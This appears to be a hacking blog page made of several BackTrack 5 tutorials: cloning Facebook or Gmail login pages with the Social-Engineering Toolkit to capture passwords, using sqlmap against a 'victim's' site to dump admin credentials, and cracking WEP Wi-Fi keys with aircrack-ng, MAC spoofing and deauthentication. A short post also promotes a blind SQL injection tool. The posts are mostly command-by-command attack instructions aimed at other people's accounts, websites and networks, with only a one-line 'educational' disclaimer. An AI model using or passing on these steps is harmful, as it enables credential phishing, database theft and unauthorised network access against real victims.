Hack facebook and Gmail using Backtrack 5

I am going to show you how to hack facebook account using backtrack 5. So just follow the simple steps.
Open your backtrack 5’s terminal and type cd /pentest/exploits/set

Now Open social Engineering Tool kit (SET) ./set

Just hit ENTER and SET will Open , Now just select 1st option (1 Social-Engineering Attacks) and hit enter after that 2nd number (just type 2 as shown in snapshot)

Now Just select 4th Option “Tabnabbing Attack Method” and Hit ENTER

Then select 2nd option “Site Cloner” and Hit ENTER

Now here you need to add the URL of Facebook (if you want to hack gmail then just add the gmail’s URL)

Now just hit the enter.

Open new terminal and just type ifconfig and hit ENTER

Now just copy this IP address and open it in Browser.

Now here I am just typing test email and password to see whether it works or not.

Now just hit enter and switch back to our terminal and we found the Email and password !

This tutorial is just educational purpose only.

Read More

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat: A Blind SQL Injection Exploitation Tool

Blind Cat is not a fully automated tool, the ones we call – “one click ownage“. You are the driving force behind this tool. Once, you understand how this tool works, you will be able to exploit a lot more difficult SQL injections easily. Consider this tool as an automation tool/front-end for manual blind SQL injections.

Click here to Download

Read More

Hack website using Backtrack

I am going to show you how to hack website using Backtrack 5 (sqlmap). Sqlmap is a automatic sql injection tool which helps you to hack website easily. Follow the simple steps to hack website using backtrack 5 sqlmap tool.

1. Open your backtrack terminal and type cd /pentest/database/sqlmap and hit enter. Now sqlmap is open in your terminal
2. Now find the vulnerable site. (well I already have vulnerable site)

3. Now type this command in the terminal and hit enter.(refer above figure)

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 –dbs

4. Now you will get the database name of the website

Well I got the two database aj and information_schema we will select aj database.

5. Now get the tables of that database. for that you need to enter this command into your terminal and simply hit Enter.

python sqlmap.py -u http://yourvictim'slink/index.php?id=4 -D (database name) –tables

6. Now we need to grab the tables from the aj database. paste this command bellow command and hit enter.

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -D aj –tables

7. Now you will get the tables list which is stored in aj database.

8. Now lets grab the columns from the admin table

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin --columns

Now we got the columns and we got username and password
9. Now lets grab the passwords of the admin

python sqlmap.py -u http://www.yourvictim'slink.com/index.php?id=4 -T admin -U test --dump

Now we got the username and the password of the website !

Read More

How to crack WEP with BackTrack 5

1.) Start monitor mode:

airmon-ng

Copy down interface

airmon-ng start (interface)

If it says "mon0" or"wifi0" is used, this is your new interface

If it says other things are running, type "kill (PID#)" for each

2.) Injection test:

aireplay-ng -9 (interface)

The APs that send pings back can be injected

Copy down your targets BSSID, channel & ESSID

aireplay-ng -9 -e (ESSID) -a (BSSID) (interface)

This lets you test specifically, can beuseful for verifying hidden SSIDs or alternative BSSIDs

3.) Target a specific channel:

airmon-ng start (interface) (channel)

4.) Change MAC:

airmon-ng stop (interface(s)

ifconfig (interface) down

macchanger--mac (faked:mac) (interface)

Copy down faked:mac

5.) Begin packet capture:

airodump-ng -c (channel) -w (dump-name) --bssid (BSSID) (new interface)

Keep an eye out for authenticating client’s MACs under Station

If found & step 6 isn’t going well, go back to step 4 and use that MAC

You may have to stop the monitoring interface & the physical one

6.) Fake authentication:

*Put in second shell*

aireplay-ng -1 0 -a (BSSID) -h (faked:mac) (interface)

Successful authentication will continually send keep-alive packets

Using "aireplay-ng -1 6000 -o 1 -q 10 -a (BSSID) -h (faked:mac) (interface)" may help for picky routers

7.) ARP replay:

*Put in third shell*

aireplay-ng -3 -b (BSSID) -h (faked:mac) (interface)

8.) Crack WEP key:

*Put in a fourth shell*

aircrack-ng -b (BSSID) (dump-name)-01.cap

Minimum around 10,000 to 20,000 IVs are needed to crack a 64-bit key & about 40,000 to 85,000 for 128-bit

Try "aircrack-ng -n 64 (dump-name)*cap"every 10,000 IVs

If you know the start of the key in hexadecimal, try running "-d #" where # is the beginning characters

If key bytes are all numbers, try running with "-t" to assume an all numeric key

Add -x2 to brute force the last 2 bytes

If you reach 2,000,000, try changing the fudge factor to "-f 4" & run 30 minutes to an hour

Retry with the fudge factor increased by4 more if that’s unsuccessful

If key bytes all start with similar numbers, try running with "-h" to assume an all ASCII key

Add -x if trying with very few IVs to prevent brute forcing the last 2 bytes

* Other attack methods:

Injection attack with 2 wireless cards:

aireplay -9 -i (receiving interface) (injecting interface)

If fails on Attack -5, make sure the injection interface MAC matches the current card MAC

Deauthentication attack:

aireplay-ng --deauth 5 -a (BSSID) -c (faked:mac) (interface)

Can be faster than an ARP replay, but you must know an authenticated client's MAC who’s online

This will disconnect the authenticated client, so they may be suspect...

Read More